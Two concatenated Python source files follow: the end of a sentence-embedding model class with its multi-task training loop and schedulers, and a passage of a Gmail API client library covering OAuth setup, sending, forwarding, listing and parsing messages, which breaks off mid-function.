Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([len(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
        We sample only as many batches from each objective as there are in the smallest one
        to ensure that training is balanced across the datasets.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
        :param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
        :param max_grad_norm: Used for gradient clipping (maximum gradient norm).
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
device = self._target_device
for loss_model in loss_models:
loss_model.to(device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
-1, callback)
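    # Usage sketch: fit() above does round-robin multi-task training. A minimal
    # call might look like the following, assuming `model` is an instance of this
    # class and `train_dataloader`, `train_loss` and `dev_evaluator` were built
    # elsewhere with this library (those names are assumptions, not definitions
    # from this file):
    #
    #   model.fit(
    #       train_objectives=[(train_dataloader, train_loss)],
    #       evaluator=dev_evaluator,
    #       epochs=1,
    #       warmup_steps=100,
    #       output_path="./output/my-model",
    #   )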
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score and save_best_model:
self.save(output_path)
self.best_score = score
def _get_scheduler(self, optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
        Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
gmail.py
|
"""
File: gmail.py
--------------
Home to the main Gmail service object. Currently supports sending mail (with
attachments) and retrieving mail with the full suite of Gmail search options.
"""
import base64
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import html
import math
import mimetypes
import os
import re
import threading
from typing import List, Optional, Union
from bs4 import BeautifulSoup
import dateutil.parser as parser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
from simplegmail import label
from simplegmail.attachment import Attachment
from simplegmail.label import Label
from simplegmail.message import Message
class Gmail(object):
"""
The Gmail class which serves as the entrypoint for the Gmail service API.
Args:
client_secret_file: The name of the user's client secret file.
Attributes:
client_secret_file (str): The name of the user's client secret file.
service (googleapiclient.discovery.Resource): The Gmail service object.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
"https://www.googleapis.com/auth/gmail.modify",
"https://www.googleapis.com/auth/gmail.settings.basic",
]
# If you don't have a client secret file, follow the instructions at:
# https://developers.google.com/gmail/api/quickstart/python
# Make sure the client secret file is in the root directory of your app.
def __init__(
self,
client_secret_file: str = "client_secret.json",
creds_file: str = "gmail_token.json",
_creds: Optional[client.OAuth2Credentials] = None,
access_type: str = "offline",
user_id: str = "me",
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
self._labels = None
self.user_id = user_id
try:
# The file gmail_token.json stores the user's access and refresh
# tokens, and is created automatically when the authorization flow
# completes for the first time.
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(
self.client_secret_file, self._SCOPES
)
flow.params["approval_prompt"] = "force"
flow.params["access_type"] = access_type
flags = tools.argparser.parse_args([])
self.creds = tools.run_flow(flow, store, flags)
self._service = build(
"gmail", "v1", http=self.creds.authorize(Http()), cache_discovery=False
)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
"the file is in the root directory of your application. If "
"you don't have a client secrets file, go to https://"
"developers.google.com/gmail/api/quickstart/python, and "
"follow the instructions listed there."
)
@property
def service(self) -> "googleapiclient.discovery.Resource":
        # Since the token is only used through calls to the service object,
        # this ensures that the token is always refreshed before use.
if self.creds.access_token_expired:
self.creds.refresh(Http())
return self._service
def send_raw_message(self, message_raw64: str, user_id: str = "me") -> dict:
try:
req = (
self.service.users()
.messages()
.send(userId=user_id, body={"raw": message_raw64})
)
res = req.execute()
return res
except HttpError as error:
# Pass along the error
raise error
def forward_message(
self,
message: Message,
sender: str,
to: str,
forward_prefix="[FWD]",
tmpdir="/tmp",
) -> Message:
fpaths = message.download_attachments(tmpdir=tmpdir)
return self.send_message(
sender=sender,
to=to,
subject=f"{forward_prefix}{message.subject}",
headers= [
{"name": "Sender", "value": sender},
{"name": "On-Behalf-Of", "value": sender},
{"name": "Resent-To", "value": sender},
{"name": "ConnySender", "value": sender}
],
msg_html=message.html,
msg_plain=message.plain,
attachments=fpaths,
)
def forward_raw_message(
self,
message: Message,
to: str,
sender: str ="") -> dict:
b64_message = message.forward_body(to, sender)
return self.send_raw_message(b64_message)
def send_message(
self,
sender: str,
to: str,
subject: str = "",
msg_html: Optional[str] = None,
msg_plain: Optional[str] = None,
cc: Optional[List[str]] = None,
bcc: Optional[List[str]] = None,
attachments: Optional[List[str]] = None,
signature: bool = False,
headers: List[dict] = [],
user_id: str = "me",
) -> Message:
"""
Sends an email.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
            msg_plain: The plain text alternate message of the email. This is
                displayed by mail clients that cannot (or choose not to) render
                HTML, or if the HTML message is not provided.
cc: The list of email addresses to be cc'd.
bcc: The list of email addresses to be bcc'd.
attachments: The list of attachment file names.
signature: Whether the account signature should be added to the
message.
user_id: The address of the sending account. 'me' for the
default address associated with the account.
Returns:
The Message object representing the sent message.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
msg = self._create_message(
sender,
to,
subject,
msg_html,
msg_plain,
cc=cc,
bcc=bcc,
attachments=attachments,
signature=signature,
headers=headers,
user_id=user_id,
)
try:
            req = self.service.users().messages().send(userId=user_id, body=msg)
res = req.execute()
return self._build_message_from_ref(user_id, res, "reference")
except HttpError as error:
# Pass along the error
raise error
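    # Usage sketch (addresses and file names below are placeholders, not values
    # defined in this module):
    #
    #   gmail = Gmail()
    #   gmail.send_message(
    #       sender="me@example.com",
    #       to="you@example.com",
    #       subject="Report",
    #       msg_plain="See attached.",
    #       attachments=["report.pdf"],
    #       signature=True,
    #   )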
def get_unread_inbox(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets unread messages from your inbox.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Labels that messages must match.
query: A Gmail query to match.
attachments: Accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.INBOX)
        return self.get_unread_messages(user_id, labels, query, attachments)
def get_starred_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets starred messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.STARRED)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_important_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets messages marked important from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.IMPORTANT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_unread_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets unread messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.UNREAD)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_drafts(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets drafts saved in your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.DRAFT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_sent_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets sent messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SENT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_trash_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets messages in your trash from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.TRASH)
return self.get_messages(user_id, labels, query, attachments, True)
def get_spam_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets messages marked as spam from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SPAM)
return self.get_messages(user_id, labels, query, attachments, True)
def get_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
refs_only: bool = False,
) -> Union[List[Message], List[dict]]:
"""
Gets messages from your account.
Args:
user_id: the user's email address. Default 'me', the authenticated
user.
labels: label IDs messages must match.
query: a Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels_ids = [lbl.id if isinstance(lbl, Label) else lbl for lbl in labels]
try:
response = (
self.service.users()
.messages()
.list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
)
.execute()
)
message_refs = []
if "messages" in response: # ensure request was successful
message_refs.extend(response["messages"])
while "nextPageToken" in response:
page_token = response["nextPageToken"]
response = (
self.service.users()
.messages()
.list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
pageToken=page_token,
)
.execute()
)
message_refs.extend(response["messages"])
if refs_only:
# Do not fetch messages yet
return message_refs
return self._get_messages_from_refs(user_id, message_refs, attachments)
except HttpError as error:
# Pass along the error
raise error
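    # Query sketch: the `query` argument accepts ordinary Gmail search syntax,
    # combined with the label and attachment options documented above, e.g.
    # (illustrative values):
    #
    #   gmail.get_messages(query="from:billing@example.com newer_than:7d has:attachment")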
def create_label(self, label_name: str, user_id: str = 'me') -> Label:
"""
Create a new label
Args:
label_name: Name for the new label
user_id: The user's email address. By default, the authenticated
user.
Returns:
A Label object.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
body = {
"name": label_name,
}
try:
res = self.service.users().labels().create(
userId=user_id,
body=body
).execute()
except HttpError as error:
# Pass along the error
raise error
else:
return Label(res['name'], res['id'])
def get_label_id(self, key: str, refresh: bool = True):
if key not in self.labels:
if refresh:
self.list_labels()
return self.get_label_id(key, refresh=False)
label = self.create_label(key)
self._labels[label.name] = label.id
return self.labels[key]
@property
def labels(self):
if self._labels is None:
self._labels = self._dict_labels(self.list_labels(self.user_id))
return self._labels
def _dict_labels(self, values: List[Label]) -> dict:
return dict(map(lambda x: [x.name, x.id], values))
def list_labels(self, user_id: str = "me") -> List[Label]:
"""
Retrieves all labels for the specified user.
These Label objects are to be used with other functions like
modify_labels().
Args:
user_id: The user's email address. By default, the authenticated
user.
Returns:
The list of Label objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
try:
res = self.service.users().labels().list(userId=user_id).execute()
except HttpError as error:
# Pass along the error
raise error
else:
labels = [Label(name=x["name"], id=x["id"]) for x in res["labels"]]
self._labels = self._dict_labels(labels)
return labels
def get_message_from_ref(
self, ref: dict, user_id: str = "me", attachments: str = "reference", with_raw: bool = False):
return self._build_message_from_ref(user_id, ref, attachments, with_raw=with_raw)
def _get_messages_from_refs(
self,
user_id: str,
message_refs: List[dict],
attachments: str = "reference",
parallel: bool = True,
) -> List[Message]:
"""
Retrieves the actual messages from a list of references.
Args:
user_id: The account the messages belong to.
message_refs: A list of message references with keys id, threadId.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download'
which downloads the attachment data to store locally. Default
'reference'.
parallel: Whether to retrieve messages in parallel. Default true.
Currently parallelization is always on, since there is no
reason to do otherwise.
Returns:
A list of Message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if not message_refs:
return []
if not parallel:
return [
self._build_message_from_ref(user_id, ref, attachments)
for ref in message_refs
]
max_num_threads = 12 # empirically chosen, prevents throttling
target_msgs_per_thread = 10 # empirically chosen
num_threads = min(
math.ceil(len(message_refs) / target_msgs_per_thread), max_num_threads
)
batch_size = math.ceil(len(message_refs) / num_threads)
message_lists = [None] * num_threads
def thread_download_batch(thread_num):
gmail = Gmail(_creds=self.creds)
start = thread_num * batch_size
end = min(len(message_refs), (thread_num + 1) * batch_size)
message_lists[thread_num] = [
gmail._build_message_from_ref(user_id, message_refs[i], attachments)
for i in range(start, end)
]
threads = [
threading.Thread(target=thread_download_batch, args=(i,))
for i in range(num_threads)
]
for t in threads:
t.start()
for t in threads:
t.join()
return sum(message_lists, [])
def get_messages_from_refs(
self,
message_refs: List[dict],
user_id: str = "me",
attachments: str = "reference",
) -> List[Message]:
return self._get_messages_from_refs(user_id, message_refs, attachments)
def _build_raw_message_from_ref(self, user_id: str, message_ref: dict) -> str:
try:
# Get message RAW base64
message = (
self.service.users()
.messages()
.get(userId=user_id, id=message_ref["id"], format="raw")
.execute()
)
return message["raw"]
except HttpError as error:
# Pass along the error
raise error
def _build_message_from_raw_json(self,
message: dict,
message_raw: Optional[str] = None,
attachments: str="reference",
user_id: str="me") -> Message:
msg_id = message["id"]
thread_id = message["threadId"]
label_ids = []
if "labelIds" in message:
user_labels = {x.id: x for x in self.list_labels(user_id=user_id)}
label_ids = [user_labels[x] for x in message["labelIds"]]
snippet = html.unescape(message["snippet"])
payload = message["payload"]
headers = payload["headers"]
# Get header fields (date, from, to, subject)
date = ""
sender = ""
recipient = ""
subject = ""
cc = None
bcc = None
msg_hdrs = {}
for hdr in headers:
if hdr["name"].lower() == "date":
try:
date = str(parser.parse(hdr["value"]).astimezone())
except Exception:
date = hdr["value"]
elif hdr["name"].lower() == "from":
sender = hdr["value"]
elif hdr["name"].lower() == "to":
recipient = hdr["value"]
elif hdr["name"].lower() == "subject":
subject = hdr["value"]
elif hdr["name"].lower() == "cc":
cc = hdr["value"]
elif hdr["name"].lower() == "bcc":
bcc = hdr["value"]
msg_hdrs[hdr["name"]] = hdr["value"]
parts = self._evaluate_message_payload(
payload, user_id, message["id"], attachments
)
plain_msg = None
html_msg = None
attms = []
for part in parts:
if part["part_type"] == "plain":
if plain_msg is None:
plain_msg = part["body"]
else:
plain_msg += "\n" + part["body"]
elif part["part_type"] == "html":
if html_msg is None:
html_msg = part["body"]
else:
html_msg += "<br/>" + part["body"]
elif part["part_type"] == "attachment":
attm = Attachment(
self.service,
user_id,
msg_id,
part["attachment_id"],
part["filename"],
part["filetype"],
part["data"],
)
attms.append(attm)
return Message(
service=self.service,
creds=self.creds,
user_id=user_id,
msg_id=msg_id,
thread_id=thread_id,
recipient=recipient,
sender=sender,
subject=subject,
date=date,
snippet=snippet,
plain=plain_msg,
html=html_msg,
bcc=bcc,
cc=cc,
label_ids=label_ids,
attachments=attms,
headers=msg_hdrs,
headers_list=headers,
raw_response=message,
raw_base64=message_raw,
)
def _build_message_from_ref(
self,
user_id: str,
message_ref: dict,
attachments: str = "reference",
with_raw: bool = False,
) -> Message:
"""
Creates a Message object from a reference.
Args:
user_id: The username of the account the message belongs to.
message_ref: The message reference object returned from the Gmail
API.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
The Message object.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
message_raw = None
try:
# Get message JSON
message = (
self.service.users()
.messages()
.get(userId=user_id, id=message_ref["id"])
.execute()
)
if with_raw:
message_raw = self._build_raw_message_from_ref(user_id, message_ref)
except HttpError as error:
# Pass along the error
raise error
else:
            return self._build_message_from_raw_json(
                message, message_raw=message_raw, attachments=attachments, user_id=user_id
            )
def _evaluate_message_payload(
self, payload: dict, user_id: str, msg_id: str, attachments: str = "reference"
) -> List[dict]:
"""
Recursively evaluates a message payload.
Args:
payload: The message payload object (response from Gmail API).
user_id: The current account address (default 'me').
msg_id: The id of the message.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message parts.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if "attachmentId" in payload["body"]: # if it's an attachment
if attachments == "ignore":
return []
att_id = payload["body"]["attachmentId"]
filename = payload["filename"]
if not filename:
filename = "unknown"
obj = {
"part_type": "attachment",
"filetype": payload["mimeType"],
"filename": filename,
"attachment_id": att_id,
"data": None,
}
if attachments == "reference":
return [obj]
else: # attachments == 'download'
if "data" in payload["body"]:
data = payload["body"]["data"]
else:
res = (
self.service.users()
.messages()
.attachments()
.get(userId=user_id, messageId=msg_id, id=att_id)
.execute()
)
data = res["data"]
file_data = base64.urlsafe_b64decode(data)
obj["data"] = file_data
return [obj]
elif payload["mimeType"] == "text/html":
data = payload["body"]["data"]
data = base64.urlsafe_b64decode(data)
body = BeautifulSoup(data, "lxml", from_encoding="utf-8").body
return [{"part_type": "html", "body": str(body)}]
elif payload["mimeType"] == "text/plain":
data = payload["body"]["data"]
data = base64.urlsafe_b64decode(data)
body = data.decode("UTF-8")
return [{"part_type": "plain", "body": body}]
elif payload["mimeType"].startswith("multipart"):
ret = []
if "parts" in payload:
for part in payload["parts"]:
ret.extend(
self._evaluate_message_payload(
part, user_id, msg_id, attachments
)
)
return ret
return []
def _create_message(
self,
sender: str,
to: str,
subject: str = "",
msg_html: str = None,
msg_plain: str = None,
cc: List[str] = None,
bcc: List[str] = None,
attachments: List[str] = None,
signature: bool = False,
headers: List[dict] = [],
user_id: str = "me",
) -> dict:
"""
Creates the raw email message to be sent.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email (for slow
or old browsers).
cc: The list of email addresses to be Cc'd.
bcc: The list of email addresses to be Bcc'd
attachments: A list of attachment file paths.
signature: Whether the account signature should be added to the
                message. Will add the signature to your HTML message only, or
                create an HTML message if none exists.
Returns:
The message dict.
"""
msg = MIMEMultipart("mixed" if attachments else "alternative")
msg["To"] = to
msg["From"] = sender
msg["Subject"] = subject
if cc:
msg["Cc"] = ", ".join(cc)
if bcc:
msg["Bcc"] = ", ".join(bcc)
if signature:
m = re.match(r".+\s<(?P<addr>.+@.+\..+)>", sender)
address = m.group("addr") if m else sender
account_sig = self._get_alias_info(address, user_id)["signature"]
if msg_html is None:
msg_html = ""
msg_html += "<br /><br />" + account_sig
attach_plain = MIMEMultipart("alternative") if attachments else msg
attach_html = MIMEMultipart("related") if attachments else msg
if msg_plain:
attach_plain.attach(MIMEText(msg_plain, "plain"))
if msg_html:
attach_html.attach(MIMEText(msg_html, "html"))
if attachments:
attach_plain.attach(attach_html)
msg.attach(attach_plain)
self._ready_message_with_attachments(msg, attachments)
return {"raw": base64.urlsafe_b64encode(msg.as_string().encode()).decode()}
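    # When attachments are present, the MIME tree assembled above nests as:
    #   multipart/mixed
    #     multipart/alternative
    #       text/plain
    #       multipart/related
    #         text/html
    #     ...attachment parts (added by _ready_message_with_attachments)
    # Without attachments, the plain and HTML parts are attached directly to a
    # single multipart/alternative message.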
def _ready_message_with_attachments(
self, msg: MIMEMultipart, attachments: List[str]
) -> None:
"""
Converts attachment filepaths to MIME objects and adds them to msg.
Args:
msg: The message to add attachments to.
attachments: A list of attachment file paths.
"""
for filepath in attachments:
content_type, encoding = mimetypes.guess_type(filepath)
if content_type is None or encoding is not None:
content_type = "application/octet-stream"
